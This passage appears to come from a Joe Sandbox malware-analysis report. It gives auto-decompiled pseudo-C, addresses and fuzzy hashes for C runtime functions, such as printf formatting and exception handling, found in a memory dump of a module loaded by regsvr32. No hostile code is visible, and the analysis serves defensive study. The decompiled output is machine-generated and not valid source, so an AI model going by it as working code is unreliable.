                                                                                        • Opcode ID: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                        • Instruction ID: 4853ceba84ddbb230417778543f3b3b02ea2aa858227094ccd1c634e11d49f23
                                                                                        • Opcode Fuzzy Hash: 939841bcdfd8ad812f8c29de7d09562b703ae5a82c5ff0fab969d8d2fb6d5a5e
                                                                                        • Instruction Fuzzy Hash: C8B1B77261CAC0CAD7B58B29E8807AFB7E0F388785F155125DAC983B99DB2DD4429F00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 35%
                                                                                        			E000007FE7FEF9D34960(void* __ecx, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, long long _a16, long long _a24, long long _a32, signed int _a40, intOrPtr _a48, long long _a56, long long _a64) {
                                                                                        				long long _v24;
                                                                                        				long long _v32;
                                                                                        				long long _v40;
                                                                                        				long long _v48;
                                                                                        				long long _v56;
                                                                                        				char _v60;
                                                                                        				char _v64;
                                                                                        				signed int _v72;
                                                                                        				char _v80;
                                                                                        				char _v88;
                                                                                        				long long _v96;
                                                                                        				intOrPtr _v104;
                                                                                        				long long _v112;
                                                                                        				long long _v120;
                                                                                        				long long _v128;
                                                                                        				signed int _v136;
                                                                                        				void* _t106;
                                                                                        				void* _t117;
                                                                                        				void* _t118;
                                                                                        				void* _t119;
                                                                                        				void* _t120;
                                                                                        				void* _t121;
                                                                                        				long long _t153;
                                                                                        				signed int _t161;
                                                                                        				signed int _t165;
                                                                                        				long long _t166;
                                                                                        				long long _t169;
                                                                                        				long long _t170;
                                                                                        				intOrPtr _t174;
                                                                                        
                                                                                        				_a32 = __r9;
                                                                                        				_a24 = __r8;
                                                                                        				_a16 = __rdx;
                                                                                        				_a8 = __rcx;
                                                                                        				_t153 = _a8;
                                                                                        				if ( *_t153 != 0x80000003) goto 0xf9d34990;
                                                                                        				goto 0xf9d34cc6;
                                                                                        				0xf9d24000();
                                                                                        				if ( *((long long*)(_t153 + 0xe0)) == 0) goto 0xf9d34a33;
                                                                                        				0xf9d24000();
                                                                                        				_v56 = _t153;
                                                                                        				E000007FE7FEF9D23D00(_t106);
                                                                                        				if ( *((intOrPtr*)(_v56 + 0xe0)) == _t153) goto 0xf9d34a33;
                                                                                        				if ( *_a8 == 0xe0434f4d) goto 0xf9d34a33;
                                                                                        				if ( *_a8 == 0xe0434352) goto 0xf9d34a33;
                                                                                        				_v120 = _a64;
                                                                                        				_v128 = _a56;
                                                                                        				_v136 = _a40;
                                                                                        				if (E000007FE7FEF9D2E9B0(_a8, _a16, _a24, _a32) == 0) goto 0xf9d34a33;
                                                                                        				goto 0xf9d34cc6;
                                                                                        				if ( *((intOrPtr*)(_a40 + 0xc)) == 0) goto 0xf9d34a43;
                                                                                        				goto 0xf9d34a48;
                                                                                        				E000007FE7FEF9D2CF80(_a40);
                                                                                        				_v120 = _a32;
                                                                                        				_v128 =  &_v60;
                                                                                        				_t161 =  &_v64;
                                                                                        				_v136 = _t161;
                                                                                        				r9d = _a48;
                                                                                        				r8d = _a56;
                                                                                        				E000007FE7FEF9D2EA30(_a16, _a40);
                                                                                        				_v72 = _t161;
                                                                                        				_v64 = _v64 + 1;
                                                                                        				_v72 = _v72 + 0x14;
                                                                                        				if (_v64 - _v60 >= 0) goto 0xf9d34cc6;
                                                                                        				if (_a48 -  *_v72 < 0) goto 0xf9d34c2b;
                                                                                        				_t165 = _v72;
                                                                                        				if (_a48 -  *((intOrPtr*)(_t165 + 4)) > 0) goto 0xf9d34c2b;
                                                                                        				_t117 = E000007FE7FEF9D2E680( *((intOrPtr*)(_t165 + 4)), _t165);
                                                                                        				_t166 = _t165 +  *((intOrPtr*)(_v72 + 0x10));
                                                                                        				if ( *((intOrPtr*)(_t166 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34b53;
                                                                                        				_t118 = E000007FE7FEF9D2E680(_t117, _t166);
                                                                                        				_v48 = _t166;
                                                                                        				_t119 = E000007FE7FEF9D2E680(_t118, _t166);
                                                                                        				_t169 = _v48 +  *((intOrPtr*)(_t166 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                                        				_v40 = _t169;
                                                                                        				goto 0xf9d34b5f;
                                                                                        				_v40 = 0;
                                                                                        				if (_v40 == 0) goto 0xf9d34bff;
                                                                                        				_t120 = E000007FE7FEF9D2E680(_t119, _t169);
                                                                                        				_t170 = _t169 +  *((intOrPtr*)(_v72 + 0x10));
                                                                                        				if ( *((intOrPtr*)(_t170 + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14)) == 0) goto 0xf9d34be3;
                                                                                        				_t121 = E000007FE7FEF9D2E680(_t120, _t170);
                                                                                        				_v32 = _t170;
                                                                                        				E000007FE7FEF9D2E680(_t121, _t170);
                                                                                        				_v24 = _v32 +  *((intOrPtr*)(_t170 +  *((intOrPtr*)(_v72 + 0x10)) + 4 + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14));
                                                                                        				goto 0xf9d34bef;
                                                                                        				_v24 = 0;
                                                                                        				_t174 = _v24;
                                                                                        				if ( *((char*)(_t174 + 0x10)) != 0) goto 0xf9d34c2b;
                                                                                        				E000007FE7FEF9D2E680( *((char*)(_t174 + 0x10)), _t174);
                                                                                        				if (( *(_t174 +  *((intOrPtr*)(_v72 + 0x10)) + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14) & 0x00000040) == 0) goto 0xf9d34c30;
                                                                                        				goto L1;
                                                                                        				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                                                        				_v72 =  *((intOrPtr*)(_v72 + 0x10));
                                                                                        				__rax = __rax +  *((intOrPtr*)(_v72 + 0x10));
                                                                                        				_v72 =  *((intOrPtr*)(_v72 + 0xc)) - 1;
                                                                                        				__rcx = ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                                        				__rax = __rax + ( *((intOrPtr*)(_v72 + 0xc)) - 1) * 0x14;
                                                                                        				__eflags = __rax;
                                                                                        				_v80 = 0;
                                                                                        				_v88 = 1;
                                                                                        				__rcx = _a64;
                                                                                        				_v96 = _a64;
                                                                                        				_v104 = _a56;
                                                                                        				__rcx = _v72;
                                                                                        				_v112 = _v72;
                                                                                        				_v120 = 0;
                                                                                        				_v128 = __rax;
                                                                                        				__rax = _a40;
                                                                                        				_v136 = _a40;
                                                                                        				__r9 = _a32;
                                                                                        				__r8 = _a24;
                                                                                        				__rdx = _a16;
                                                                                        				__rcx = _a8;
                                                                                        				__eax = E000007FE7FEF9D35180(__edi, __esi, __esp, __eflags, _a8, _a16, _a24, _a32);
                                                                                        				goto L1;
                                                                                        				return __eax;
                                                                                        			}
































                                                                                        0x7fef9d34960
                                                                                        0x7fef9d34965
                                                                                        0x7fef9d3496a
                                                                                        0x7fef9d3496f
                                                                                        0x7fef9d3497b
                                                                                        0x7fef9d34989
                                                                                        0x7fef9d3498b
                                                                                        0x7fef9d34990
                                                                                        0x7fef9d3499d
                                                                                        0x7fef9d349a3
                                                                                        0x7fef9d349a8
                                                                                        0x7fef9d349ad
                                                                                        0x7fef9d349be
                                                                                        0x7fef9d349ce
                                                                                        0x7fef9d349de
                                                                                        0x7fef9d349e8
                                                                                        0x7fef9d349f4
                                                                                        0x7fef9d34a00
                                                                                        0x7fef9d34a2c
                                                                                        0x7fef9d34a2e
                                                                                        0x7fef9d34a3f
                                                                                        0x7fef9d34a41
                                                                                        0x7fef9d34a43
                                                                                        0x7fef9d34a50
                                                                                        0x7fef9d34a5a
                                                                                        0x7fef9d34a5f
                                                                                        0x7fef9d34a64
                                                                                        0x7fef9d34a69
                                                                                        0x7fef9d34a71
                                                                                        0x7fef9d34a89
                                                                                        0x7fef9d34a8e
                                                                                        0x7fef9d34a9b
                                                                                        0x7fef9d34aa8
                                                                                        0x7fef9d34ab5
                                                                                        0x7fef9d34ac9
                                                                                        0x7fef9d34acf
                                                                                        0x7fef9d34ade
                                                                                        0x7fef9d34ae4
                                                                                        0x7fef9d34af2
                                                                                        0x7fef9d34b0b
                                                                                        0x7fef9d34b0d
                                                                                        0x7fef9d34b12
                                                                                        0x7fef9d34b17
                                                                                        0x7fef9d34b46
                                                                                        0x7fef9d34b49
                                                                                        0x7fef9d34b51
                                                                                        0x7fef9d34b53
                                                                                        0x7fef9d34b68
                                                                                        0x7fef9d34b6e
                                                                                        0x7fef9d34b7c
                                                                                        0x7fef9d34b95
                                                                                        0x7fef9d34b97
                                                                                        0x7fef9d34b9c
                                                                                        0x7fef9d34ba4
                                                                                        0x7fef9d34bd9
                                                                                        0x7fef9d34be1
                                                                                        0x7fef9d34be3
                                                                                        0x7fef9d34bef
                                                                                        0x7fef9d34bfd
                                                                                        0x7fef9d34bff
                                                                                        0x7fef9d34c29
                                                                                        0x7fef9d34c2b
                                                                                        0x7fef9d34c30
                                                                                        0x7fef9d34c3a
                                                                                        0x7fef9d34c3e
                                                                                        0x7fef9d34c4b
                                                                                        0x7fef9d34c4e
                                                                                        0x7fef9d34c52
                                                                                        0x7fef9d34c52
                                                                                        0x7fef9d34c55
                                                                                        0x7fef9d34c5a
                                                                                        0x7fef9d34c5f
                                                                                        0x7fef9d34c67
                                                                                        0x7fef9d34c73
                                                                                        0x7fef9d34c77
                                                                                        0x7fef9d34c7c
                                                                                        0x7fef9d34c81
                                                                                        0x7fef9d34c8a
                                                                                        0x7fef9d34c8f
                                                                                        0x7fef9d34c97
                                                                                        0x7fef9d34c9c
                                                                                        0x7fef9d34ca4
                                                                                        0x7fef9d34cac
                                                                                        0x7fef9d34cb4
                                                                                        0x7fef9d34cbc
                                                                                        0x7fef9d34cc1
                                                                                        0x7fef9d34ccd

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: MOC$RCC
                                                                                        • API String ID: 0-2084237596
                                                                                        • Opcode ID: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                        • Instruction ID: 969568d65f9d334bdbb71439fdfa9ac9293f65c07e2bfce327525da45f7ede8f
                                                                                        • Opcode Fuzzy Hash: ff3899ab70367f580fbe79aa5854b52896b6d0a2cba9891fdbb3d09f9aae126f
                                                                                        • Instruction Fuzzy Hash: FA91193260DB8582DAA4DB55E49077EB3A0F7C4785F214526EACE83BA9CF3DE041CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: Locale_unlock$UpdateUpdate::~___updatetmbcinfo
                                                                                        • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbctype.c
                                                                                        • API String ID: 4112623284-4095683531
                                                                                        • Opcode ID: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                        • Instruction ID: 45fc69fecf93984735d9c4b87304ebe4c96837b84e7424b4db74fc1719c3d08d
                                                                                        • Opcode Fuzzy Hash: 8356b35877ad84119bda948381768e140a73398435746945450b774d02776550
                                                                                        • Instruction Fuzzy Hash: 83911D36619B8586E7A08B19E98036E77E0F388798F654236EACD477B8CB3DD541CB01
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 19%
                                                                                        			E000007FE7FEF9D3C6F8(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                                                        				signed int _t217;
                                                                                        				signed char _t222;
                                                                                        				intOrPtr _t257;
                                                                                        				signed int _t332;
                                                                                        				signed int _t333;
                                                                                        				signed long long _t336;
                                                                                        				intOrPtr* _t359;
                                                                                        				signed long long _t384;
                                                                                        
                                                                                        				_t332 = __rax;
                                                                                        				_a116 = 0x10;
                                                                                        				asm("bts eax, 0xf");
                                                                                        				_a708 = 7;
                                                                                        				_a708 = 0x27;
                                                                                        				_a72 = 0x10;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                                                        				_a84 = 0x30;
                                                                                        				_a85 = _a708 + 0x51;
                                                                                        				_a92 = 2;
                                                                                        				_a72 = 8;
                                                                                        				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                                                        				asm("bts eax, 0x9");
                                                                                        				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                                                        				E000007FE7FEF9D31EA0( &_a1112);
                                                                                        				_a824 = _t332;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                                                        				E000007FE7FEF9D31EA0( &_a1112);
                                                                                        				_a824 = _t332;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
                                                                                        				_t333 = E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t333;
                                                                                        				goto 0xf9d3c80e;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t333;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t333;
                                                                                        				goto 0xf9d3c84b;
                                                                                        				E000007FE7FEF9D31E40( &_a1112);
                                                                                        				_a824 = _t333;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
                                                                                        				if (_a824 >= 0) goto 0xf9d3c882;
                                                                                        				_a832 =  ~_a824;
                                                                                        				asm("bts eax, 0x8");
                                                                                        				goto 0xf9d3c892;
                                                                                        				_t336 = _a824;
                                                                                        				_a832 = _t336;
                                                                                        				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
                                                                                        				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
                                                                                        				_a832 = _a832 & _t336;
                                                                                        				if (_a116 >= 0) goto 0xf9d3c8d8;
                                                                                        				_a116 = 1;
                                                                                        				goto 0xf9d3c8f5;
                                                                                        				_a80 = _a80 & 0xfffffff7;
                                                                                        				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
                                                                                        				_a116 = 0x200;
                                                                                        				if (_a832 != 0) goto 0xf9d3c908;
                                                                                        				_a92 = 0;
                                                                                        				_a64 =  &_a687;
                                                                                        				_t217 = _a116;
                                                                                        				_a116 = _a116 - 1;
                                                                                        				if (_t217 > 0) goto 0xf9d3c936;
                                                                                        				if (_a832 == 0) goto 0xf9d3c9d3;
                                                                                        				_a1040 = _a72;
                                                                                        				_a816 = _t217 / _a1040 + 0x30;
                                                                                        				_a1048 = _a72;
                                                                                        				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
                                                                                        				_t222 = _a816 + _a708;
                                                                                        				_a816 = _t222;
                                                                                        				 *_a64 = _a816 & 0x000000ff;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				goto 0xf9d3c915;
                                                                                        				_a104 = _t222;
                                                                                        				_a64 = _a64 + 1;
                                                                                        				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
                                                                                        				if (_a104 == 0) goto 0xf9d3ca12;
                                                                                        				if ( *_a64 == 0x30) goto 0xf9d3ca31;
                                                                                        				_a64 = _a64 - 1;
                                                                                        				 *_a64 = 0x30;
                                                                                        				_a104 = _a104 + 1;
                                                                                        				if (_a108 != 0) goto 0xf9d3cc6e;
                                                                                        				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
                                                                                        				_a84 = 0x2d;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
                                                                                        				_a84 = 0x2b;
                                                                                        				_a92 = 1;
                                                                                        				goto 0xf9d3ca95;
                                                                                        				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
                                                                                        				_a84 = 0x20;
                                                                                        				_a92 = 1;
                                                                                        				_a840 = _a88 - _a104 - _a92;
                                                                                        				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
                                                                                        				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                                        				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
                                                                                        				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
                                                                                        				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
                                                                                        				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
                                                                                        				if (_a76 == 0) goto 0xf9d3cc1d;
                                                                                        				if (_a104 <= 0) goto 0xf9d3cc1d;
                                                                                        				_a872 = 0;
                                                                                        				_a848 = _a64;
                                                                                        				_a856 = _a104;
                                                                                        				_a856 = _a856 - 1;
                                                                                        				if (_a856 == 0) goto 0xf9d3cc1b;
                                                                                        				_a1056 =  *_a848 & 0x0000ffff;
                                                                                        				r9d = _a1056 & 0x0000ffff;
                                                                                        				r8d = 6;
                                                                                        				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
                                                                                        				_a848 =  &(_a848[1]);
                                                                                        				if (_a872 != 0) goto 0xf9d3cbe5;
                                                                                        				if (_a860 != 0) goto 0xf9d3cbf2;
                                                                                        				_a688 = 0xffffffff;
                                                                                        				goto 0xf9d3cc1b;
                                                                                        				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
                                                                                        				goto 0xf9d3cb60;
                                                                                        				goto 0xf9d3cc3b;
                                                                                        				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
                                                                                        				if (_a688 < 0) goto 0xf9d3cc6e;
                                                                                        				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
                                                                                        				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
                                                                                        				if (_a96 == 0) goto 0xf9d3cc8e;
                                                                                        				0xf9d25330();
                                                                                        				_a96 = 0;
                                                                                        				goto 0xf9d3b99c;
                                                                                        				if (_a704 == 0) goto 0xf9d3ccb4;
                                                                                        				if (_a704 == 7) goto 0xf9d3ccb4;
                                                                                        				_a1060 = 0;
                                                                                        				goto 0xf9d3ccbf;
                                                                                        				_a1060 = 1;
                                                                                        				_t257 = _a1060;
                                                                                        				_a876 = _t257;
                                                                                        				if (_a876 != 0) goto 0xf9d3cd05;
                                                                                        				_t359 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
                                                                                        				_a32 = _t359;
                                                                                        				r9d = 0;
                                                                                        				r8d = 0x8f5;
                                                                                        				0xf9d2b3b0();
                                                                                        				if (_t257 != 1) goto 0xf9d3cd05;
                                                                                        				asm("int3");
                                                                                        				if (_a876 != 0) goto 0xf9d3cd61;
                                                                                        				0xf9d2ab30();
                                                                                        				 *_t359 = 0x16;
                                                                                        				_a32 = 0;
                                                                                        				r9d = 0x8f5;
                                                                                        				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        				_a912 = 0xffffffff;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				goto 0xf9d3cd80;
                                                                                        				_a916 = _a688;
                                                                                        				E000007FE7FEF9D26800( &_a120);
                                                                                        				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t384, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
                                                                                        			}











                                                                                        0x7fef9d3c6f8
                                                                                        0x7fef9d3c6f8
                                                                                        0x7fef9d3c704
                                                                                        0x7fef9d3c70c
                                                                                        0x7fef9d3c719
                                                                                        0x7fef9d3c724
                                                                                        0x7fef9d3c737
                                                                                        0x7fef9d3c739
                                                                                        0x7fef9d3c748
                                                                                        0x7fef9d3c74c
                                                                                        0x7fef9d3c756
                                                                                        0x7fef9d3c769
                                                                                        0x7fef9d3c76f
                                                                                        0x7fef9d3c782
                                                                                        0x7fef9d3c78c
                                                                                        0x7fef9d3c791
                                                                                        0x7fef9d3c799
                                                                                        0x7fef9d3c7a9
                                                                                        0x7fef9d3c7b3
                                                                                        0x7fef9d3c7b8
                                                                                        0x7fef9d3c7c0
                                                                                        0x7fef9d3c7ce
                                                                                        0x7fef9d3c7d9
                                                                                        0x7fef9d3c7e8
                                                                                        0x7fef9d3c7ec
                                                                                        0x7fef9d3c7f4
                                                                                        0x7fef9d3c7fe
                                                                                        0x7fef9d3c806
                                                                                        0x7fef9d3c80e
                                                                                        0x7fef9d3c819
                                                                                        0x7fef9d3c823
                                                                                        0x7fef9d3c82a
                                                                                        0x7fef9d3c832
                                                                                        0x7fef9d3c83c
                                                                                        0x7fef9d3c843
                                                                                        0x7fef9d3c854
                                                                                        0x7fef9d3c85f
                                                                                        0x7fef9d3c86c
                                                                                        0x7fef9d3c878
                                                                                        0x7fef9d3c880
                                                                                        0x7fef9d3c882
                                                                                        0x7fef9d3c88a
                                                                                        0x7fef9d3c89d
                                                                                        0x7fef9d3c8aa
                                                                                        0x7fef9d3c8bf
                                                                                        0x7fef9d3c8cc
                                                                                        0x7fef9d3c8ce
                                                                                        0x7fef9d3c8d6
                                                                                        0x7fef9d3c8df
                                                                                        0x7fef9d3c8eb
                                                                                        0x7fef9d3c8ed
                                                                                        0x7fef9d3c8fe
                                                                                        0x7fef9d3c900
                                                                                        0x7fef9d3c910
                                                                                        0x7fef9d3c915
                                                                                        0x7fef9d3c91f
                                                                                        0x7fef9d3c925
                                                                                        0x7fef9d3c930
                                                                                        0x7fef9d3c93b
                                                                                        0x7fef9d3c95e
                                                                                        0x7fef9d3c96a
                                                                                        0x7fef9d3c997
                                                                                        0x7fef9d3c9a9
                                                                                        0x7fef9d3c9ab
                                                                                        0x7fef9d3c9bf
                                                                                        0x7fef9d3c9c9
                                                                                        0x7fef9d3c9ce
                                                                                        0x7fef9d3c9e0
                                                                                        0x7fef9d3c9ec
                                                                                        0x7fef9d3c9fc
                                                                                        0x7fef9d3ca03
                                                                                        0x7fef9d3ca10
                                                                                        0x7fef9d3ca1a
                                                                                        0x7fef9d3ca24
                                                                                        0x7fef9d3ca2d
                                                                                        0x7fef9d3ca36
                                                                                        0x7fef9d3ca45
                                                                                        0x7fef9d3ca52
                                                                                        0x7fef9d3ca54
                                                                                        0x7fef9d3ca59
                                                                                        0x7fef9d3ca61
                                                                                        0x7fef9d3ca6c
                                                                                        0x7fef9d3ca6e
                                                                                        0x7fef9d3ca73
                                                                                        0x7fef9d3ca7b
                                                                                        0x7fef9d3ca86
                                                                                        0x7fef9d3ca88
                                                                                        0x7fef9d3ca8d
                                                                                        0x7fef9d3caa5
                                                                                        0x7fef9d3cab5
                                                                                        0x7fef9d3cad0
                                                                                        0x7fef9d3caee
                                                                                        0x7fef9d3cafc
                                                                                        0x7fef9d3cb07
                                                                                        0x7fef9d3cb22
                                                                                        0x7fef9d3cb2c
                                                                                        0x7fef9d3cb37
                                                                                        0x7fef9d3cb3d
                                                                                        0x7fef9d3cb4d
                                                                                        0x7fef9d3cb59
                                                                                        0x7fef9d3cb70
                                                                                        0x7fef9d3cb79
                                                                                        0x7fef9d3cb8a
                                                                                        0x7fef9d3cb92
                                                                                        0x7fef9d3cb9b
                                                                                        0x7fef9d3cbb6
                                                                                        0x7fef9d3cbc9
                                                                                        0x7fef9d3cbd9
                                                                                        0x7fef9d3cbe3
                                                                                        0x7fef9d3cbe5
                                                                                        0x7fef9d3cbf0
                                                                                        0x7fef9d3cc11
                                                                                        0x7fef9d3cc16
                                                                                        0x7fef9d3cc1b
                                                                                        0x7fef9d3cc36
                                                                                        0x7fef9d3cc43
                                                                                        0x7fef9d3cc4e
                                                                                        0x7fef9d3cc69
                                                                                        0x7fef9d3cc74
                                                                                        0x7fef9d3cc80
                                                                                        0x7fef9d3cc85
                                                                                        0x7fef9d3cc8e
                                                                                        0x7fef9d3cc9b
                                                                                        0x7fef9d3cca5
                                                                                        0x7fef9d3cca7
                                                                                        0x7fef9d3ccb2
                                                                                        0x7fef9d3ccb4
                                                                                        0x7fef9d3ccbf
                                                                                        0x7fef9d3ccc6
                                                                                        0x7fef9d3ccd5
                                                                                        0x7fef9d3ccd7
                                                                                        0x7fef9d3ccde
                                                                                        0x7fef9d3cce3
                                                                                        0x7fef9d3cce6
                                                                                        0x7fef9d3ccf8
                                                                                        0x7fef9d3cd00
                                                                                        0x7fef9d3cd02
                                                                                        0x7fef9d3cd0d
                                                                                        0x7fef9d3cd0f
                                                                                        0x7fef9d3cd14
                                                                                        0x7fef9d3cd1a
                                                                                        0x7fef9d3cd23
                                                                                        0x7fef9d3cd3e
                                                                                        0x7fef9d3cd43
                                                                                        0x7fef9d3cd53
                                                                                        0x7fef9d3cd5f
                                                                                        0x7fef9d3cd68
                                                                                        0x7fef9d3cd74
                                                                                        0x7fef9d3cd97

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.927302319.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                                                        • Associated: 00000003.00000002.927297170.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927319388.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927327720.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                        • Associated: 00000003.00000002.927337335.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                                                        Similarity
                                                                                        • API ID: get_int64_arg
                                                                                        • String ID: 0$9
                                                                                        • API String ID: 1967237116-1975997740
                                                                                        • Opcode ID: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                        • Instruction ID: c0a57250e5e6ff09cb8cd0b3e72d4402f8dee1629557039505579d47a847bcbd
                                                                                        • Opcode Fuzzy Hash: aed7fbe3ab945623e5c36a128674cf35c8ffbba07ad38133e4628ccf625e54aa
                                                                                        • Instruction Fuzzy Hash: 1E41C87660DAC187E7B58B19E8917AEB7E4F385791F100125EBC886B98DBBDD540CF00
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 23%
                                                                                        			E000007FE7FEF9D3E70C(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, short _a86, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a1200, signed short _a1212, intOrPtr _a1216, intOrPtr _a1220, signed char _a1296, signed int _a1304, signed int _a1312, intOrPtr _a1320, long long _a1328, signed char _a1336, intOrPtr _a1340, intOrPtr _a1344, intOrPtr _a1376, intOrPtr _a1380, signed int _a1480, long long _a1488, long long _a1496, long long _a1504, signed int _a1512, intOrPtr _a1536, char _a1560) {
                                                                                        				signed int _t213;
                                                                                        				signed char _t218;
                                                                                        				void* _t249;
                                                                                        				intOrPtr _t257;
                                                                                        				signed int _t331;
                                                                                        				signed int _t332;
                                                                                        				signed long long _t335;
                                                                                        				intOrPtr* _t354;
                                                                                        				intOrPtr* _t359;
                                                                                        				signed long long _t389;
                                                                                        
